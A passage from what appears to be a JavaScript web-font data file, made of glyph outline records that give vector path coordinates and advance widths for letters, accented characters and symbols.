,41v34,0,61,-21,59,-56v-2,-43,-31,-55,-80,-53r0,-22v41,2,68,-13,67,-47","w":209},{"d":"257,-95v0,61,-46,97,-107,100r0,65r-25,0r0,-66v-86,5,-137,-92,-87,-159v13,-17,32,-28,55,-36r8,23v-38,14,-58,38,-58,73v0,45,27,70,82,75r0,-176v78,-4,132,31,132,101xm150,-172r0,152v81,1,105,-84,60,-130v-14,-15,-35,-21,-60,-22","w":275},{"d":"59,7r162,-272r19,0r-162,272r-19,0xm92,-173v-2,-30,-38,-30,-69,-21r15,-68r70,0r0,17r-55,0r-7,31v34,-8,64,11,66,41v3,54,-98,65,-105,10r20,0v5,32,68,23,65,-10xm240,-136v38,-4,62,46,25,63v47,18,23,76,-26,76v-49,0,-72,-58,-25,-76v-39,-18,-12,-67,26,-63xm214,-101v0,26,51,28,50,0v0,-13,-11,-18,-25,-18v-12,0,-25,7,-25,18xm207,-37v1,32,65,30,64,-1v0,-15,-14,-26,-31,-26v-17,0,-34,11,-33,27","w":299},{"d":"198,-180r0,24r-178,0r0,-24r178,0xm198,-103r0,24r-178,0r0,-24r178,0","w":218},{"d":"18,-94v0,-102,146,-136,195,-58r-19,13v-40,-61,-151,-34,-151,43v0,78,109,104,151,45r19,13v-17,25,-47,43,-89,43v-57,0,-106,-43,-106,-99","w":232},{"d":"18,-89v0,-58,30,-101,85,-101v29,0,49,12,63,35r8,-32r34,0v-17,62,-16,129,3,187r-36,0v-4,-13,-6,-25,-8,-34v-40,75,-149,32,-149,-55xm163,-93v0,-41,-14,-73,-54,-73v-38,0,-54,31,-54,74v0,40,17,73,54,73v39,0,54,-29,54,-74","w":226},{"d":"0,0r167,-259r160,0r0,27r-122,0r0,79r122,0r0,26r-122,0r0,102r122,0r0,25r-148,0r0,-85r-94,0r-55,85r-30,0xm102,-109r77,0r0,-120","w":357},{"d":"18,-94v-9,-88,116,-138,165,-68r0,-103r24,0r0,103v48,-70,174,-19,164,68v9,87,-118,138,-164,65r0,99r-24,0r0,-99v-46,72,-174,21,-165,-65xm272,-173v-41,2,-66,33,-66,82v0,41,28,73,65,73v44,1,76,-36,76,-78v0,-42,-35,-78,-75,-77xm117,-173v-41,-1,-74,36,-74,78v0,42,33,80,76,77v42,-3,65,-28,65,-78v0,-45,-27,-76,-67,-77","w":389},{"d":"43,-268v12,24,66,25,78,0r23,0v-9,49,-116,49,-125,0r24,0","w":163},{"d":"119,-173v-76,1,-68,89,-67,173r-25,0r0,-191r25,0r0,34v17,-22,38,-38,72,-39v87,-1,69,108,70,196r-24,0v-5,-70,22,-174,-51,-173xm133,-226r-24,0r-51,-45r31,0r31,27r32,-27r33,0","w":219},{"d":"18,-95v0,-54,45,-101,100,-101v54,0,99,45,99,101v0,54,-44,100,-99,100v-55,0,-100,-46,-100,-100xm192,-95v2,-40,-35,-77,-74,-77v-39,0,-77,36,-75,77v1,44,31,77,75,77v44,0,72,-33,74,-77xm107,-271r24,0r51,45r-31,0r-31,-27r-33,27r-32,0","w":235},{"d":"50,7r162,-272r20,0r-163,272r-19,0xm40,-262r32,0r0,133r-19,0r0,-116r-26,0xm240,-136v38,0,62,46,25,63v47,18,23,76,-26,76v-49,0,-72,-58,-25,-76v-38,-18,-13,-63,26,-63xm214,-101v0,26,50,28,50,0v0,-13,-12,-18,-25,-18v-12,0,-25,7,-25,18xm207,-37v1,32,65,30,64,-1v0,-15,-14,-26,-31,-26v-17,0,-34,11,-33,27","w":299},{"d":"79,109r0,-203r-82,0r0,-31r82,0r0,-203r31,0r0,203r36,0r0,-203r31,0r0,203r83,0r0,31r-83,0r0,203r-31,0r0,-203r-36,0r0,203r-31,0"},{"d":"272,-131v-1,77,-57,138,-139,138v-48,0,-86,-18,-113,-52r20,-15v39,48,114,56,165,18v22,-16,34,-42,39,-76r-122,0r0,-25r121,0v-3,-97,-151,-132,-203,-52r-20,-16v22,-31,63,-54,113,-54v76,-2,140,59,139,134","w":292},{"d":"18,-95v0,-54,45,-101,100,-101v54,0,99,45,99,101v0,54,-44,100,-99,100v-55,0,-100,-46,-100,-100xm192,-95v2,-40,-35,-77,-74,-77v-39,0,-77,36,-75,77v1,44,31,77,75,77v44,0,72,-33,74,-77xm58,-260r121,0r0,21r-121,0r0,-21","w":235},{"d":"260,-127r-263,0r0,-31r263,0r0,31xm79,-60r-82,0r0,-31r113,0r0,200r-31,0r0,-169xm146,109r0,-200r114,0r0,31r-83,0r0,169r-31,0"},{"d":"40,-191v-12,-68,49,-99,95,-66v11,8,15,21,16,35r-25,0v-3,-16,-13,-24,-29,-24v-30,0,-33,21,-32,55r39,0r0,21r-39,0r0,170r-25,0r0,-170r-25,0r0,-21r25,0xm126,-191r25,0r0,191r-25,0r0,-191","w":175},{"d":"33,-174v0,-12,9,-22,21,-22v12,0,23,9,22,22v0,12,-10,21,-22,21v-12,0,-21,-9,-21,-21xm52,-47r24,11r-36,66r-18,-7","w":99},{"d":"41,-184r-18,0r7,-81r26,0","w":71},{"d":"11,-259r30,0r66,107r65,-107r30,0r-82,135r0,124r-25,0r0,-124xm96,-333r39,54r-25,0r-51,-54r37,0","w":213},{"d":"18,-95v0,-54,45,-101,100,-101v54,0,99,45,99,101v0,54,-44,100,-99,100v-55,0,-100,-46,-100,-100xm192,-95v2,-40,-35,-77,-74,-77v-39,0,-77,36,-75,77v1,44,31,77,75,77v44,0,72,-33,74,-77xm54,-250v33,-42,79,15,116,-12r12,17v-34,39,-86,-20,-117,13","w":235},{"d":"57,-24r111,0r0,-235r26,0r0,235r112,0r0,-235r26,0r0,259r-301,0r0,-259r26,0r0,235","w":362},{"d":"332,-24r44,0r0,63r-24,0r0,-39r-321,0r0,-259r26,0r0,235r111,0r0,-235r26,0r0,235r112,0r0,-235r26,0r0,235","w":383},{"d":"16,-250v0,-11,9,-20,20,-20v11,0,20,9,20,20v0,11,-9,21,-20,21v-11,0,-20,-10,-20,-21xm24,-191r25,0r0,191r-25,0r0,-191","w":72},{"d":"18,-94v0,-102,146,-136,195,-58r-19,13v-40,-61,-151,-34,-151,43v0,78,109,104,151,45r19,13v-17,25,-47,43,-89,43v-57,0,-106,-43,-106,-99xm105,-271r24,0r51,45r-31,0r-31,-27r-33,27r-32,0","w":232},{"d":"27,-191v56,-2,116,-3,114,48v0,19,-9,32,-26,39v25,9,38,26,38,51v0,55,-66,56,-126,53r0,-191xm115,-139v0,-32,-25,-33,-63,-31r0,60v36,1,63,2,63,-29xm125,-53v0,-35,-36,-37,-73,-35r0,67v38,1,73,4,73,-32","w":168},{"d":"158,-57v1,59,-67,60,-131,57r0,-191r25,0r0,76v60,-4,105,6,106,58xm131,-56v0,-38,-36,-38,-78,-37r0,72v39,2,78,-2,78,-35xm192,-191r24,0r0,191r-24,0r0,-191","w":241},{"d":"79,-281r38,0r-52,54r-24,0","w":135},{"d":"263,-262r0,66r-22,0r0,22r22,0r0,65r-22,0r0,22r22,0r0,66r-22,0r0,22r22,0r0,66r-22,0r0,22r22,0r0,21r-263,0r0,-65r22,0r0,-22r-22,0r0,-66r22,0r0,-22r-22,0r0,-65r22,0r0,-22r-22,0r0,-66r22,0r0,-22r-22,0r0,-66r22,0r0,-22r22,0r0,22r22,0r0,-22r22,0r0,22r22,0r0,-22r21,0r0,22r22,0r0,-22r22,0r0,22r22,0r0,-22r22,0r0,22r22,0r0,-22r22,0r0,44r-22,0r0,22r22,0xm22,-284r0,22r22,0r0,-22r-22,0xm66,-284r0,22r22,0r0,-22r-22,0xm110,-284r0,22r21,0r0,-22r-21,0xm153,-284r0,22r22,0r0,-22r-22,0xm197,-284r0,22r22,0r0,-22r-22,0xm241,-240r-22,0r0,22r22,0r0,-22xm197,-240r-22,0r0,22r22,0r0,-22xm153,-240r-22,0r0,22r22,0r0,-22xm110,-240r-22,0r0,22r22,0r0,-22xm66,-240r-22,0r0,22r22,0r0,-22xm22,-196r0,22r22,0r0,-22r-22,0xm66,-196r0,22r22,0r0,-22r-22,0xm110,-196r0,22r21,0r0,-22r-21,0xm153,-196r0,22r22,0r0,-22r-22,0xm197,-196r0,22r22,0r0,-22r-22,0xm66,-152r-22,0r0,22r22,0r0,-22xm88,-152r0,22r22,0r0,-22r-22,0xm131,-152r0,22r22,0r0,-22r-22,0xm175,-152r0,22r22,0r0,-22r-22,0xm219,-152r0,22r22,0r0,-22r-22,0xm22,-109r0,22r22,0r0,-22r-22,0xm110,-109r0,22r21,0r0,-22r-21,0xm88,-87r0,-22r-22,0r0,22r22,0xm153,-109r0,22r22,0r0,-22r-22,0xm197,-109r0,22r22,0r0,-22r-22,0xm241,-43r0,-22r-22,0r0,22r22,0xm197,-43r0,-22r-22,0r0,22r22,0xm153,-43r0,-22r-22,0r0,22r22,0xm110,-43r0,-22r-22,0r0,22r22,0xm66,-43r0,-22r-22,0r0,22r22,0xm22,-21r0,22r22,0r0,-22r-22,0xm66,-21r0,22r22,0r0,-22r-22,0xm110,-21r0,22r21,0r0,-22r-21,0xm153,-21r0,22r22,0r0,-22r-22,0xm197,-21r0,22r22,0r0,-22r-22,0xm241,45r0,-22r-22,0r0,22r22,0xm197,45r0,-22r-22,0r0,22r22,0xm153,45r0,-22r-22,0r0,22r22,0xm110,45r0,-22r-22,0r0,22r22,0xm66,45r0,-22r-22,0r0,22r22,0xm22,67r0,22r22,0r0,-22r-22,0xm66,67r0,22r22,0r0,-22r-22,0xm110,67r0,22r21,0r0,-22r-21,0xm153,67r0,22r22,0r0,-22r-22,0xm197,67r0,22r22,0r0,-22r-22,0","w":262},{"d":"84,0r39,-96r-39,-95r26,0r39,95r-39,96r-26,0xm4,0r39,-96r-39,-95r26,0r39,95r-39,96r-26,0","w":152},{"d":"6,-233r0,-26r142,0r0,26r-58,0r0,233r-26,0r0,-233r-58,0","w":153},{"d":"198,-75v2,82,-80,76,-167,75r0,-259r26,0r0,111v82,-2,139,1,141,73xm171,-73v-1,-56,-51,-50,-114,-49r0,97v62,-1,115,8,114,-48","w":218},{"d":"177,-94r-180,0r0,-31r82,0r0,-203r31,0r0,203r36,0r0,-203r31,0r0,234"},{"d":"38,-133v-6,114,153,162,216,80r18,0v-29,37,-54,58,-108,58v-82,0,-140,-55,-140,-137v0,-81,56,-137,138,-139v65,-2,126,52,126,113v0,59,-39,99,-90,104v-13,1,-22,-4,-21,-19v-31,38,-101,8,-97,-46v3,-42,30,-85,75,-83v24,1,35,9,46,26r5,-24r19,0r-22,122v0,5,3,10,9,9v34,-6,62,-42,62,-85v0,-58,-53,-102,-113,-101v-74,1,-119,50,-123,122xm157,-183v-56,-3,-75,107,-10,108v50,1,68,-107,10,-108","w":312},{"d":"11,-259r30,0r66,107r65,-107r30,0r-82,135r0,124r-25,0r0,-124xm50,-298v0,-12,9,-21,21,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-21,-9,-21,-20xm122,-298v0,-11,9,-21,20,-21v12,0,21,9,21,21v0,11,-10,20,-21,20v-11,0,-20,-9,-20,-20","w":213},{"d":"108,5v-98,0,-84,-101,-84,-196r25,0v3,75,-18,178,59,172v46,-3,58,-23,58,-83r0,-89r26,0v0,0,14,196,-84,196xm53,-246v0,-12,9,-21,21,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-21,-9,-21,-20xm125,-246v0,-11,9,-21,20,-21v12,0,21,9,21,21v0,11,-10,20,-21,20v-11,0,-20,-9,-20,-20","w":218},{"d":"217,-132v0,75,-29,136,-99,137v-70,0,-100,-62,-100,-137v0,-75,32,-137,100,-138v69,0,100,63,99,138xm192,-143v-2,-56,-23,-105,-74,-105v-51,0,-72,50,-74,105r148,0xm44,-122v2,57,22,104,74,104v52,0,72,-47,74,-104r-148,0","w":235},{"d":"18,-95v0,-54,45,-101,100,-101v54,0,99,45,99,101v0,54,-44,100,-99,100v-55,0,-100,-46,-100,-100xm192,-95v2,-40,-35,-77,-74,-77v-39,0,-77,36,-75,77v1,44,31,77,75,77v44,0,72,-33,74,-77","w":235},{"d":"198,-75v2,82,-80,76,-167,75r0,-259r26,0r0,111v82,-2,139,1,141,73xm171,-73v-1,-56,-51,-50,-114,-49r0,97v62,-1,115,8,114,-48xm228,-259r26,0r0,259r-26,0r0,-259","w":285},{"d":"53,0r125,-249r125,249r-250,0","w":356},{"d":"61,-31v-85,-79,-26,-234,95,-234v30,0,57,9,82,26r26,-31r18,16r-26,31v22,22,34,53,36,94v4,104,-123,175,-212,113r-29,34r-19,-15xm221,-219v-72,-52,-174,0,-174,91v0,30,10,56,31,77xm97,-36v74,45,172,-7,169,-93v0,-29,-10,-54,-28,-74","w":312},{"d":"274,-57v0,50,-51,63,-111,57r-65,-146r-64,146r-25,0r88,-191r4,0r36,76v69,-2,137,-4,137,58xm247,-56v0,-45,-54,-37,-101,-37r33,72v37,2,68,-6,68,-35","w":285},{"d":"159,-285r13,0r0,59v22,1,42,9,61,25r51,-50r9,9r-50,51v16,21,25,42,25,63r59,0r0,12r-59,0v-2,22,-10,42,-25,61r50,51r-10,9r-50,-49v-20,15,-40,22,-61,24r0,59r-13,0r0,-59v-24,-3,-44,-11,-61,-24r-52,49r-9,-9r50,-51v-15,-18,-23,-39,-25,-62r-59,0r0,-12r59,0v2,-23,10,-43,25,-61r-50,-51r9,-10r51,50v21,-15,42,-24,62,-25r0,-59xm165,-33v48,0,90,-42,90,-90v0,-48,-42,-90,-90,-90v-48,0,-90,42,-90,90v0,48,42,90,90,90","w":330},{"d":"80,109r0,-437r30,0r0,437r-30,0xm146,-127r0,-201r31,0r0,170r83,0r0,31r-114,0xm146,109r0,-200r114,0r0,31r-83,0r0,169r-31,0"},{"d":"85,39v-3,27,-38,33,-66,24r4,-13v21,12,61,-9,29,-16v-3,0,-8,0,-13,2r2,-14v18,-5,46,-2,44,17","w":116},{"d":"156,-38v-27,25,-86,27,-112,0r-21,20r-16,-16r21,-20v-25,-28,-25,-81,0,-109r-21,-20r16,-16r21,21v27,-24,84,-27,111,-1r21,-20r15,16r-20,20v27,25,26,83,1,109r20,20r-15,16xm100,-174v-35,0,-66,31,-66,66v0,35,31,66,66,66v35,0,66,-31,66,-66v0,-35,-31,-66,-66,-66","w":199},{"d":"-61,7r162,-272r20,0r-163,272r-19,0","w":59},{"d":"104,-204r-10,-5v6,-10,10,-19,10,-27r-12,0r0,-29r24,0v0,28,1,45,-12,61xm49,-262r25,0r0,71r39,0r0,21r-39,0r0,170r-25,0r0,-170r-34,0r0,-21r34,0r0,-71","w":121},{"d":"12,-191r140,0r-108,169r105,0r0,22r-147,0r108,-170r-98,0r0,-21xm51,-246v0,-11,9,-21,20,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-20,-9,-20,-20","w":152},{"d":"278,-145v-2,66,-31,86,-84,121r76,0r0,24r-99,0r0,-34v53,-38,77,-49,81,-110v3,-58,-43,-96,-101,-96v-58,0,-104,38,-101,96v3,61,27,72,80,110r0,34r-99,0r0,-24r76,0v-53,-36,-81,-54,-84,-121v-3,-72,56,-120,128,-120v72,0,130,49,127,120xm13,-265r-5,60r-20,0r-5,-60r30,0","w":301},{"d":"17,-259r26,0r53,187r74,-187r5,0r74,187r53,-187r27,0r-74,259r-5,0r-77,-196r-78,196r-5,0xm117,-298v0,-12,9,-21,21,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-21,-9,-21,-20xm189,-298v0,-11,9,-21,20,-21v12,0,21,9,21,21v0,11,-10,20,-21,20v-11,0,-20,-9,-20,-20","w":345},{"d":"66,-265r0,200r-26,0r0,-200r26,0xm31,-17v0,-27,44,-28,44,0v0,12,-10,22,-22,22v-12,0,-22,-10,-22,-22","w":106},{"d":"235,0r-27,0r0,-198r-171,198r-5,0r0,-259r25,0r0,202r172,-202r6,0r0,259xm95,-320v12,24,66,25,78,0r23,0v-9,49,-116,49,-125,0r24,0","w":266},{"d":"306,-249r0,254r-255,-127","w":356},{"d":"235,0r-27,0r0,-198r-171,198r-5,0r0,-259r25,0r0,202r172,-202r6,0r0,259","w":266},{"d":"0,17v1,-25,28,-14,37,-6v5,0,6,-5,6,-10r-8,-168v5,-51,-12,-153,41,-160v12,-1,22,8,22,18v1,11,-6,19,-16,19v-7,0,-27,-22,-27,1v4,99,12,120,5,242v-3,52,-3,81,-39,86v-12,2,-21,-10,-21,-22","w":98},{"d":"22,0r0,-172r172,0r0,172r-172,0xm108,-51v19,0,35,-16,35,-35v0,-19,-16,-36,-35,-36v-19,0,-36,17,-36,36v0,19,17,35,36,35","w":216},{"d":"260,-109r-263,0r0,-219r263,0r0,219"},{"d":"31,-259r27,0r0,97r103,-97r35,0r-124,116r134,143r-35,0r-113,-121r0,121r-27,0r0,-259","w":212},{"d":"195,-190v0,50,-35,70,-90,70r93,120r-32,0r-93,-120r-14,0r0,120r-26,0r0,-259v84,-2,162,-5,162,69xm168,-190v0,-49,-56,-44,-109,-43r0,88v53,1,109,5,109,-45xm115,-278r-24,0r-51,-45r31,0r31,27r32,-27r33,0","w":218},{"d":"18,-131v0,-126,66,-137,192,-138r0,23v-33,8,-114,1,-137,21v-21,18,-34,52,-34,92v11,-39,40,-62,84,-63v55,-1,100,47,100,101v0,53,-46,102,-100,100v-68,-3,-105,-55,-105,-136xm123,-18v41,0,75,-36,75,-77v0,-40,-36,-77,-75,-77v-39,0,-75,36,-75,77v0,41,34,77,75,77","w":240},{"d":"16,-250v0,-11,10,-20,21,-20v11,0,20,9,20,20v0,11,-9,21,-20,21v-12,0,-21,-9,-21,-21xm-11,47v21,10,35,5,35,-25r0,-213r25,0r0,220v4,42,-26,55,-60,40r0,-22","w":73},{"d":"16,-93v0,-86,99,-132,157,-75v18,17,28,42,29,75r-146,0r0,65v37,35,99,25,122,-22r13,7v-23,32,-40,48,-82,49v-55,2,-93,-44,-93,-99xm161,-106r0,-53v-28,-28,-79,-28,-105,1r0,52r105,0","w":216},{"d":"293,-57v2,59,-66,61,-130,57r0,-92r-111,0r0,92r-25,0r0,-191r25,0r0,76r111,0r0,-76r25,0r0,76v60,-4,103,7,105,58xm266,-55v0,-38,-36,-38,-78,-37r0,71v38,2,78,-1,78,-34","w":304},{"d":"29,-41v36,34,87,33,87,-44r0,-174r26,0r0,175v15,96,-75,110,-127,63","w":173},{"d":"6,-233r0,-26r142,0r0,26r-58,0r0,233r-26,0r0,-233r-58,0","w":153},{"d":"92,-224v-5,-35,-66,-30,-65,7r-18,0v0,-28,24,-48,53,-48v34,0,61,31,43,61v-10,17,-41,42,-58,58r66,0r0,17r-112,0r63,-57v17,-17,24,-19,28,-38","w":119},{"d":"171,-233r-151,0r0,-26r151,0r0,26xm171,-127r-151,0r0,-25r151,0r0,25xm171,0r-151,0r0,-25r151,0r0,25","w":191},{"d":"108,5v-98,0,-84,-101,-84,-196r25,0v3,75,-18,178,59,172v46,-3,58,-23,58,-83r0,-89r26,0v0,0,14,196,-84,196xm121,-281r38,0r-52,54r-24,0","w":218},{"d":"137,-259r121,259r-28,0r-41,-85r-111,0r-41,85r-28,0r122,-259r6,0xm134,-204r-45,94r89,0xm74,-265r-5,60r-20,0r-5,-60r30,0","w":266},{"d":"18,-97v0,-94,127,-132,174,-61r0,-33r25,0r0,152v24,131,-159,148,-197,54r27,0v31,61,167,48,145,-51v-46,66,-174,33,-174,-61xm193,-97v0,-45,-29,-75,-73,-75v-45,0,-76,32,-78,76v-2,42,33,73,76,73v44,0,75,-30,75,-74","w":242},{"d":"31,-259r27,0r0,97r103,-97r35,0r-124,116r134,143r-35,0r-113,-121r0,121r-27,0r0,-259xm135,-333r38,0r-52,54r-24,0","w":212},{"d":"31,-259r184,0r0,259r-26,0r0,-234r-132,0r0,234r-26,0r0,-259","w":245},{"d":"18,-94v0,-99,137,-140,181,-58r-20,13v-38,-61,-136,-33,-136,43v0,71,88,65,128,87v44,46,-17,102,-81,80r6,-22v35,13,88,-13,55,-41v-6,-4,-20,-9,-41,-12v-61,-10,-92,-39,-92,-90","w":208},{"d":"27,-191r25,0r0,80r89,-80r34,0r-97,87r105,104r-35,0r-88,-88r-8,6r0,82r-25,0r0,-191xm114,-281r38,0r-52,54r-24,0","w":180},{"d":"27,-265r25,0r0,151r88,-77r37,0r-105,91r111,100r-35,0r-96,-86r0,86r-25,0r0,-265","w":180},{"d":"118,-196v36,1,59,18,76,40r0,-35r24,0r0,191r-24,0r0,-33v-18,23,-42,36,-77,38v-53,1,-98,-48,-98,-101v0,-53,45,-101,99,-100xm195,-95v0,-42,-34,-78,-75,-77v-45,1,-76,32,-76,77v0,43,32,77,75,77v44,0,76,-30,76,-77xm112,-281r39,54r-25,0r-51,-54r37,0","w":245},{"d":"129,5v-35,-2,-59,-16,-77,-38r0,103r-24,0r0,-261r24,0r0,35v17,-23,40,-39,76,-40v54,-1,99,47,99,100v0,53,-45,102,-98,101xm202,-95v0,-45,-31,-76,-76,-77v-41,-1,-76,35,-76,77v0,46,33,77,77,77v43,0,75,-34,75,-77","w":245},{"d":"74,-107r43,0r0,21r-43,0r0,86r-25,0r0,-86r-38,0r0,-21r38,0r0,-63r-34,0r0,-21r34,0r0,-71r25,0r0,71r39,0r0,21r-39,0r0,63","w":121},{"d":"258,0r-249,0r122,-259r6,0xm218,-25r-84,-179r-85,179r169,0","w":266},{"d":"118,-196v36,1,59,18,76,40r0,-35r24,0r0,191r-24,0r0,-33v-18,23,-42,36,-77,38v-53,1,-98,-48,-98,-101v0,-53,45,-101,99,-100xm195,-95v0,-42,-34,-78,-75,-77v-45,1,-76,32,-76,77v0,43,32,77,75,77v44,0,76,-30,76,-77xm85,-260v0,-20,18,-37,38,-37v20,0,37,17,37,37v0,20,-17,38,-37,38v-20,0,-39,-17,-38,-38xm142,-260v0,-9,-9,-20,-19,-19v-10,-1,-20,9,-20,19v0,10,10,19,20,19v9,0,19,-10,19,-19","w":245},{"d":"54,-196v12,0,23,9,22,22v0,12,-10,21,-22,21v-12,0,-21,-9,-21,-21v0,-12,9,-22,21,-22","w":99},{"d":"18,-95v0,-54,45,-101,100,-101v54,0,99,45,99,101v0,54,-44,100,-99,100v-55,0,-100,-46,-100,-100xm192,-95v2,-40,-35,-77,-74,-77v-39,0,-77,36,-75,77v1,44,31,77,75,77v44,0,72,-33,74,-77xm62,-246v0,-12,9,-21,21,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-21,-9,-21,-20xm134,-246v0,-11,9,-21,20,-21v12,0,21,9,21,21v0,11,-10,20,-21,20v-11,0,-20,-9,-20,-20","w":235},{"d":"17,-259r26,0r53,187r74,-187r5,0r74,187r53,-187r27,0r-74,259r-5,0r-77,-196r-78,196r-5,0xm162,-333r39,54r-25,0r-51,-54r37,0","w":345},{"d":"313,0r-286,0r0,-191r25,0r0,168r106,0r0,-168r25,0r0,168r105,0r0,-168r25,0r0,191","w":340},{"d":"-2,-112r274,0r0,23r-274,0r0,-23","w":270},{"d":"189,0r-26,0r-64,-139r-63,139r-27,0r88,-191r4,0","w":199},{"d":"11,-259r30,0r66,107r65,-107r30,0r-82,135r0,124r-25,0r0,-124","w":213},{"d":"52,-170r0,170r-25,0r0,-191r68,0r0,-24r24,0r0,45r-67,0","w":128},{"d":"118,-196v36,1,59,18,76,40r0,-35r24,0r0,191r-24,0r0,-33v-18,23,-42,36,-77,38v-53,1,-98,-48,-98,-101v0,-53,45,-101,99,-100xm195,-95v0,-42,-34,-78,-75,-77v-45,1,-76,32,-76,77v0,43,32,77,75,77v44,0,76,-30,76,-77xm134,-281r38,0r-52,54r-24,0","w":245},{"d":"19,-328r22,0r0,22r-22,0r0,-22xm106,-328r22,0r0,22r-22,0r0,-22xm194,-328r22,0r0,22r-22,0r0,-22xm63,-284r22,0r0,22r-22,0r0,-22xm150,-284r22,0r0,22r-22,0r0,-22xm238,-284r22,0r0,22r-22,0r0,-22xm194,-240r22,0r0,22r-22,0r0,-22xm106,-240r22,0r0,22r-22,0r0,-22xm19,-240r22,0r0,22r-22,0r0,-22xm238,-196r22,0r0,22r-22,0r0,-22xm150,-196r22,0r0,22r-22,0r0,-22xm63,-196r22,0r0,22r-22,0r0,-22xm19,-152r22,0r0,22r-22,0r0,-22xm106,-152r22,0r0,22r-22,0r0,-22xm194,-152r22,0r0,22r-22,0r0,-22xm238,-109r22,0r0,22r-22,0r0,-22xm150,-109r22,0r0,22r-22,0r0,-22xm63,-109r22,0r0,22r-22,0r0,-22xm19,-65r22,0r0,22r-22,0r0,-22xm106,-65r22,0r0,22r-22,0r0,-22xm194,-65r22,0r0,22r-22,0r0,-22xm63,-21r22,0r0,22r-22,0r0,-22xm150,-21r22,0r0,22r-22,0r0,-22xm238,-21r22,0r0,22r-22,0r0,-22xm194,23r22,0r0,22r-22,0r0,-22xm106,23r22,0r0,22r-22,0r0,-22xm19,23r22,0r0,22r-22,0r0,-22xm63,67r22,0r0,22r-22,0r0,-22xm150,67r22,0r0,22r-22,0r0,-22xm238,67r22,0r0,22r-22,0r0,-22"},{"d":"235,-191r7,0r65,191r-26,0r-47,-141r-74,141r-4,0r-74,-141r-47,141r-26,0r66,-191r6,0r77,149","w":316},{"d":"31,-258r156,0r0,31r-122,0r0,227r-34,0r0,-258","w":195},{"d":"19,-138v0,-57,57,-55,114,-53r0,191r-25,0r0,-86r-17,0r-55,86r-27,0r58,-88v-26,-3,-48,-22,-48,-50xm43,-137v1,32,27,31,65,30r0,-63v-37,0,-67,-3,-65,33","w":160},{"d":"108,5v-98,0,-84,-101,-84,-196r25,0v3,75,-18,178,59,172v46,-3,58,-23,58,-83r0,-89r26,0v0,0,14,196,-84,196xm139,67v-49,16,-75,-43,-34,-67r19,0v-14,12,-21,23,-21,34v1,16,18,22,38,18","w":218},{"d":"52,-170r0,170r-25,0r0,-191r97,0r0,21r-72,0xm91,-281r38,0r-52,54r-24,0","w":129},{"d":"95,0r-67,0r0,-191r24,0r0,168r111,0r0,-168r25,0r0,191r-70,0r0,30r-23,0r0,-30","w":215},{"d":"198,-212r0,24r-178,0r0,-24r178,0xm20,-141r178,0r0,24r-178,0r0,-24xm198,-71r0,24r-178,0r0,-24r178,0","w":218},{"d":"121,7v-63,0,-89,-33,-89,-109r0,-157r26,0r0,157v-5,59,16,84,61,84v93,0,49,-150,59,-241r26,0v-5,112,31,266,-83,266xm107,-333r39,54r-25,0r-51,-54r37,0","w":235},{"d":"20,-128v2,-80,56,-135,135,-137v76,-2,137,61,137,136v0,74,-61,136,-135,136v-74,0,-138,-62,-137,-135xm266,-129v0,-65,-47,-111,-110,-111v-63,0,-108,47,-109,112v-1,60,49,111,109,109v65,-1,110,-46,110,-110xm145,-333r39,54r-25,0r-51,-54r37,0","w":312},{"d":"10,-246v0,-12,9,-21,21,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-21,-9,-21,-20xm82,-246v0,-11,9,-21,20,-21v12,0,21,9,21,21v0,11,-10,20,-21,20v-11,0,-20,-9,-20,-20","w":132},{"d":"2,-191r25,0r58,139r62,-139r4,0r61,139r60,-139r26,0r-83,191r-5,0r-61,-137r-61,137r-5,0","w":299},{"d":"55,-131v0,-28,26,-54,54,-54v28,0,54,26,54,54v0,28,-26,54,-54,54v-28,0,-54,-26,-54,-54","w":218},{"d":"18,-95v0,-54,45,-101,100,-101v54,0,99,45,99,101v0,54,-44,100,-99,100v-55,0,-100,-46,-100,-100xm192,-95v2,-40,-35,-77,-74,-77v-39,0,-77,36,-75,77v1,44,31,77,75,77v44,0,72,-33,74,-77xm113,-281r38,0r-52,54r-24,0xm169,-281r38,0r-52,54r-24,0","w":235},{"d":"50,-7v0,-44,-2,-64,-37,-68r0,-29v40,-4,37,-33,37,-81v0,-56,12,-76,65,-74r0,28v-29,0,-37,5,-36,36v0,63,1,86,-36,105v29,14,36,33,36,80v0,48,-7,62,36,62r0,27v-59,2,-65,-24,-65,-86","w":126},{"d":"24,-191r25,0r0,191r-25,0r0,-191xm48,-281r38,0r-52,54r-24,0","w":72},{"d":"51,-265r59,0r0,25r-34,0r0,286r34,0r0,24r-59,0r0,-335","w":126},{"d":"135,-271v80,0,138,59,138,137v0,81,-58,139,-138,139v-79,0,-139,-58,-139,-138v0,-80,58,-138,139,-138xm135,-14v68,0,118,-50,118,-119v0,-68,-49,-120,-118,-120v-69,0,-119,52,-119,120v0,68,50,119,119,119xm178,-55v-8,-30,7,-73,-36,-66r-40,0r0,66r-25,0r0,-159v56,1,125,-11,123,45v-1,18,-6,25,-20,35v29,8,9,56,26,79r-28,0xm175,-168v0,-32,-43,-21,-73,-23r0,47v31,-1,73,8,73,-24","w":268},{"d":"20,-131v0,-99,109,-165,204,-120v19,10,36,23,48,40r-20,16v-20,-26,-51,-45,-93,-45v-65,0,-109,45,-112,112v-4,105,145,149,205,68r20,15v-24,30,-61,52,-113,52v-80,2,-139,-58,-139,-138","w":292},{"d":"64,-248v-15,1,-22,8,-28,21r-19,0v3,-48,90,-50,93,-2v0,10,-5,18,-16,25v44,17,21,78,-29,78v-32,0,-48,-15,-53,-42r19,0v3,34,68,32,68,-1v0,-21,-19,-23,-44,-25r0,-17v38,7,46,-37,9,-37xm76,7r162,-272r20,0r-163,272r-19,0xm272,-139r0,93r18,0r0,17r-18,0r0,30r-20,0r0,-30r-76,0xm252,-46r0,-43r-37,43r37,0","w":299},{"d":"21,-129v-1,-102,103,-162,203,-124v19,8,39,21,57,38r-20,19v-24,-24,-58,-43,-98,-43v-64,0,-111,45,-115,109v-8,122,200,156,219,31r-82,0r0,-25r111,0v1,80,-52,129,-130,131v-80,2,-144,-58,-145,-136xm147,-323r24,0r51,45r-31,0r-31,-27r-33,27r-32,0","w":313},{"d":"150,-8v42,44,-19,102,-82,79r7,-22v34,12,85,-11,56,-40v-5,-4,-20,-11,-42,-13v-87,-7,-87,-136,-14,-152v-71,-27,-38,-114,37,-114v18,0